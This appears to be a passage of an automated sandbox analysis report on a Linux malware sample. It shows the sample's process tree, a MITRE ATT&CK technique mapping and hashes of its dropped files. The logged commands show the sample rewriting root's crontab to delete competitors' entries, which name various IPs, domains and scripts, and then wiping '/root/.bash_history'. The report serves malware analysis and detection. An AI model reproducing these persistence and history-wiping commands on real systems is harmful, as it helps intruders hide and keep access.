PID:1781
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:1797
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1805
-
-
/bin/sedsed /update.sh/d2⤵PID:1804
-
-
/usr/bin/crontabcrontab -l2⤵PID:1803
-
-
/bin/sedsed /systemd-service.sh/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/bin/sedsed /pg_stat.sh/d2⤵PID:1810
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1811
-
-
/usr/bin/crontabcrontab -l2⤵PID:1809
-
-
/bin/sedsed /sleep/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/bin/sedsed /oka/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/bin/sedsed /linux1213/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/bin/sedsed "/#wget/d"2⤵PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/bin/sedsed "/#curl/d"2⤵PID:1825
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/bin/sedsed /zsvc/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/bin/sedsed /givemexyz/d2⤵PID:1831
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed /world/d2⤵PID:1834
-
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:1833
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/bin/sedsed /1.sh/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/bin/sedsed /3.sh/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/bin/sedsed /workers/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/bin/sedsed /oracleservice/d2⤵PID:1846
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1847
-
-
/usr/bin/crontabcrontab -l2⤵PID:1845
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1850
-
-
/bin/sedsed /192.81.212.13/d2⤵PID:1849
-
-
/usr/bin/crontabcrontab -l2⤵PID:1848
-
-
/bin/sedsed /base64/d2⤵PID:1852
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1853
-
-
/usr/bin/crontabcrontab -l2⤵PID:1851
-
-
/bin/sedsed /python/d2⤵PID:1855
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1856
-
-
/usr/bin/crontabcrontab -l2⤵PID:1854
-
-
/bin/sedsed /shm/d2⤵PID:1858
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1859
-
-
/usr/bin/crontabcrontab -l2⤵PID:1857
-
-
/bin/sedsed /postgresql/d2⤵PID:1861
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1862
-
-
/usr/bin/crontabcrontab -l2⤵PID:1860
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1865
-
-
/bin/sedsed /cloudfronts/d2⤵PID:1864
-
-
/usr/bin/crontabcrontab -l2⤵PID:1863
-
-
/bin/sedsed /sshd/d2⤵PID:1867
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1868
-
-
/usr/bin/crontabcrontab -l2⤵PID:1866
-
-
/bin/sedsed /linux/d2⤵PID:1870
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1871
-
-
/usr/bin/crontabcrontab -l2⤵PID:1869
-
-
/bin/sedsed /neoogilvy/d2⤵PID:1873
-
-
/usr/bin/crontabcrontab -l2⤵PID:1872
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1874
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1877
-
-
/bin/sedsed /rsync/d2⤵PID:1876
-
-
/usr/bin/crontabcrontab -l2⤵PID:1875
-
-
/bin/sedsed /bpdeliver/d2⤵PID:1879
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1880
-
-
/usr/bin/crontabcrontab -l2⤵PID:1878
-
-
/bin/sedsed /perfcc/d2⤵PID:1882
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1883
-
-
/usr/bin/crontabcrontab -l2⤵PID:1881
-
-
/bin/sedsed /atdb/d2⤵PID:1885
-
-
/usr/bin/crontabcrontab -l2⤵PID:1884
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1886
-
-
/usr/bin/crontabcrontab -l2⤵PID:1887
-
-
/bin/grepgrep -v grep2⤵PID:1889
-
-
/bin/grepgrep -e 185.81.68.1242⤵PID:1888
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1894
-
-
/usr/bin/crontabcrontab -l2⤵PID:1895
-
-
/bin/rmrm -rf /root/.bash_history2⤵PID:1896
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Scheduled Task/Job
1Cron
1Privilege Escalation
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1Boot or Logon Autostart Execution
1XDG Autostart Entries
1Create or Modify System Process
1Systemd Service
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Scheduled Task/Job
1Cron
1Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Hijack Execution Flow
1Dynamic Linker Hijacking
1Impair Defenses
1Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.7MB
MD5b3039abf2ad5202f4a9363b418002351
SHA10ceb8ffb0be23b808b534d744440f4367e17b9c5
SHA256787e2c94e6d9ce5ec01f5cbe9ee2518431eca8523155526d6dc85934c9c5787c
SHA5128b1a1003a021d0f69b9295f496bf550932ce85b096ca7057632756348da1354c2b104ff36e901b27def030b79749c8fc7f54163d6195e5e0cb9b357353ee654e
-
Filesize
26KB
MD5ccef46c7edf9131ccffc47bd69eb743b
SHA138c56b5e1489092b80c9908f04379e5a16876f01
SHA256c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a
SHA512da452f1022e7ba6e5b958d39d3e5d0418339d55bf8b2ad8cfc9e25a43ad61b6e992df9df97b75d64a22a5b8dde35308f4934d7b0c591bb460526bf24ead808cc
-
Filesize
198B
MD540d800480894888e7b6abd3c91625348
SHA1dc97c4c45b5fa7c51572e47a36bf63f5ba908e08
SHA25690a16951a40101be4cb3e2c55c0a8de710e0e744e7cae003483fa3f825ea67f4
SHA512634f058551676a3d2b8ef126d975da66a8735c089aa4dcec8bd9cc5cd344fde66c445bd9677349fefefc6b7b2e80ad0cb95a585ad5d6f9b7ca7aa6f026ce4857
-
Filesize
843B
MD53ffbfa3b3bf9bcdd4db5493f88594fb6
SHA11c7975d3a4f1fa9c27cf355af686407dc472ec6c
SHA256fa6d481a75cbbebad50a938def5a215a431413dabcac6b9cd758bb3ef9fbbf98
SHA5129d592e705761f4623354090081a2bb99ab43d7b107ab4f511aca4c4813c90a1a903ec38a74592a66c9fa677f3c98f49b0586625ea65ea29e96f9c2a7a30110e5
-
Filesize
1KB
MD5391e1ba1406f92c337c8a93c3a2dd7d3
SHA15bb885b3ebd92d240b558406e3f6f3e112c41af8
SHA256f22635ec56572e2eaedb379305c904e9f2c676d0b81aa1fae1401ac1edffd936
SHA5123768d2a45949c08507b8025d6c3341bd7d609570e4887205987dbdb7d1e858d9882d6d3e01daf98a80bb83a999af360eae46c414e96aa9eddce4f0141be47363
-
Filesize
249B
MD56911fa5ac8be75479fbdf1adcf4e925f
SHA16e65593c47b5f5a525358878123157ffd296641b
SHA256aa3aa36312b2fd4a7eb5c2a1481ac565d8085e500d40f8af4305270c86cdd505
SHA512e00e4c9d70043c7344ecf3990b6b1674b4bb3d8a8c31a1fa5c5c42d792d2e41198854fcf557b9c04ce6403a7d9713809fa6c98c3a8d7198855a8bbd0ac985158
-
Filesize
175B
MD5ed082f7f3d0587f12fa8826ef7517faa
SHA15f4a4caad9f3f2d5dd14d45420c38caff7880c39
SHA256a2b7f0ff7255f31c99da11943fee04bd4610d74fdb09c55e727c4122e9665248
SHA5121a651876561d80b3a5f5a55e2365a726e840f0b9cb650b123548ffff66ff1ce8b47ce5cb79a54601a5dc780b19be112c9f2ae24321147e04fc1cb552fd18f9b7
-
Filesize
175B
MD58838d7a13e8b2f9860395feff770923c
SHA1666794eca5adb4cbc459c31e52ee42df8e8680a1
SHA256d788384f0e4120e05bd0643b60ce2783e75a1db6234ec14d166a85c55d406a8b
SHA512202781136e0af902e6a9c28f77e82a3eba64258d4f348ea67fda1727117b3026dbb8fc037d6adb293393257848790963470a595c9e36e7b11221384002b003ab
-
Filesize
175B
MD5860ac57cc5f6f95c9023bd152332ac4c
SHA13b9c95a76e2b86be0a7a1e20a98e1934357f7fc5
SHA25640be3e5fdcc1fa42b817809478bf2783c383763a532bf7446f3545b305e616d7
SHA51237e14b3d0189dfce7fb55e512b33fe9f903740ceed71dc96c433ed7dd38821e484abe993d8e12edf2a875a412b489a0c7496b01119b9b0ec00fff849fc2e7596
-
Filesize
175B
MD5674964199407d33e5f99b6e397970686
SHA1f59b1a7d8f17f7bc625fe55fc048c1df8b4dbdf0
SHA25623a180c44be8ee6215daca7ecf8502a6c4337f2d2dc601b2cb340f06b4b39027
SHA512f0de8d5cae8aba09a7201382819e508a3214ef4b293723cc7d6cf6d2d497f6203ba41227c29aa02e0794d0e87202d108478d5ba73e3c3a23706d8bdef0fea487
-
Filesize
175B
MD5d00db98d712cb581d7a7234cec3e9260
SHA10f9cf32d7564712db1d5e29843006f74efcf7522
SHA256ea297aeec52596851b7d79cd521d8a6340002f228901e6105612c0cae3fbd4a0
SHA5126a1890e2c20e3c73b36f504a93f5bab9cf50a382948991d93e1c0aa36f47c95104d3519d29b5908bff9c2ea07531a1df7fb3d4ba6b3eadc95dc4a17b4174093a
-
Filesize
175B
MD5476c0517fabaecfac4bde113f3580c31
SHA12a06a30865cd4a93d82dc1c70b1a2cd3425f3a6e
SHA256be3efdcbe159e52ccd3b519da6c439bad961bd381ca0485b397daa7ae93e9673
SHA512410b412ff504c99eb0aa7c18d04aac3fb15fdc2f56a2b74a347503780bfe56e0513f3794aee139f933ab9145b29e27da4d73c57badce1cafe5b40815b3cbd390
-
Filesize
175B
MD5391ed3f00051d844402a4cd41c43603c
SHA1992584a1a661ceb7628911cd8cf4ff8c544ababa
SHA2568782ba05c5dc94c197da5b4818e0b7d24f4764b601178c9261c1f6f248f39ef2
SHA512710154d37b9cec432b1c456bdd201c12c290ab47384758a57d80dc57d4d66301f603a2edfb7fff7bf8b48ed47a9319ca491e3ca196dac7e651f018e278945158
-
Filesize
175B
MD5f70fe41fa7569fdffc72c7563c51b31b
SHA12a999d171153ea7ffd6497203584268ae40908f4
SHA2562c0302140a84e9186f577ee0fa9415c62ec94e4e68609d406a9cfefd82da8ef3
SHA512af12ae7d08c7f70f39072157996f6d689dfefdbf2cef265c133125a11976015fd63f968d00e2d5415155c2760869bf448536d345f0bdc6975b2a4ac8def24ece
-
Filesize
175B
MD51b17cc5e349459064f4419760006bc16
SHA17e780811b1335c8c541ea5f32ca7e611d9ab05bf
SHA2567dec87ddea10e1d29c1dfc3c6dc0ca11eb954584b54c69bb0e0a65e159c3b0a1
SHA5121d67f0c1ec13d46bb1af921a0ace3bff87b5675ca723d94ee580e10caa6912856b9960b579c0209a3d56991ad56046a488e92627258739d11f8c402ce94e8bc0
-
Filesize
175B
MD53e0e45e2c83cdaf6dbb17a29f87ff230
SHA1f857804fc40898ad8c089385b6424c2c526ed01b
SHA256081473cdf82243ab0edcd5cd5c750f17c37ecebe0f8bf202a1fa0de3bc7e8edd
SHA512592fc44193285c70b3f80f6f6deb15ab5b062f0a3649cc4a9ae99944e09b60f05bc49539cd0cd684908eec402d5a6bf4dcbf419d83b63646400ec341317da85e
-
Filesize
128B
MD53552f6273b57d3a13e56bdacf7efa370
SHA14f0aa9a6e20d0c338c53ab5a8a3c916487779f49
SHA25665d6e8873707cb24c153e945b61333754d63d65b3a5b545bea69e2a1f577582e
SHA512bcd71c3c9083e0a82686284c9a27378539d890ae32c1aebe2b15ad1f91ee887ef02238b7aa851c46447238a9c03a39c22b9479e6f863588ec9a0dcba76edee4f
-
Filesize
146B
MD5572e4a21ffdc641e09921644bb841ae9
SHA12ef41c4931ac84c7760a7e837d84c6726836cd0e
SHA25695edca069cf87a5238cf57701fe408e987a728d6b908228846969d72a5c8476e
SHA51264c4c6c0518dc6769d486ccca580eea4988ec2c3fcea0522489cbbba805b7686a2df30139a148bfc416e57167f2df999afa367388c1fbdcd97e211858c127f1b
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
915B
MD554edc85d323c48dae255e2efc5db3acf
SHA1755c846e96faa343b8f3f77e509b296cbf5dcef4
SHA256cc636809062ab5fd0add55dc2c2406c6cd0bbf072429e5f8df7f1ace304179a0
SHA512c88eb301908cbcba37a2a6341de8b02626a24670f18a75747d827163896fbbf7ebf5fa661eab93b91e4e5a7d382a79e2a8f2de75c1a1d3b775adf24e092949b2
-
Filesize
288B
MD531cf2a223a87b34468fa82c70879fa64
SHA159867dd3ec895ed5954b10799150c39c7dc6f38d
SHA2562d84b889999196115af491be8aff6d2db2265ae3ad1a9415a36c0e924017c9ec
SHA512c24824428c61fac6033d51e2037327722618422c1ad7a550b2a10bc1d8b4a511cdc6773b1704de69ab682066837220fb745f1e543dc033994c97c4e5676cb863
-
Filesize
89B
MD51bbfe772328709f86b314ea34818b92b
SHA159358bc75c79f671254b2e9ba3077b55e4a39864
SHA256d8ec4124975e0ee929b39ca8a181ff39d75816c7291d7f69f1a5f852f7e2dabb
SHA5120f2d027da8ea2c7045a841ae2e8799e674f31bde8ead11b1945fe77af1e6c58311b8bb77503cf0f2f43e079f25cbc012080bb5b8af7485e937ed4cbee07bbfa5
-
Filesize
288B
MD5601140cb4c21a61522e052c7a073f54c
SHA157102cf5a1bd7c03d083bb42a457ae796580e0cd
SHA2565279e0559badf5e30d8d5b827492b82be4d55607ef85ebe3f97dae0d0413a9e1
SHA5120224ad51896357a45545b846cd669a86809b53b89c7f12eb3971b9db249816cdd32381bec7af6a2e1ef6edc3cb18ac2f552b159be3d96a867b3d1cb73a76d7e1
-
Filesize
89B
MD5034374f6760d97e846e800124f9f5c1c
SHA182cca3aca53d12271335d003453e239a6b187729
SHA25675d5f499bdbd3c7f424b5daf802db26e06cf78959372f6dbb27c814e55885671
SHA5129e09c8a5e07d4f1465af30e881face1ca1d0128033abfc818e1c031fcd15ad34321f59cbe476783cbd6c108241b73f0fabdf5a08e89cc9b16f5de08eca07daf5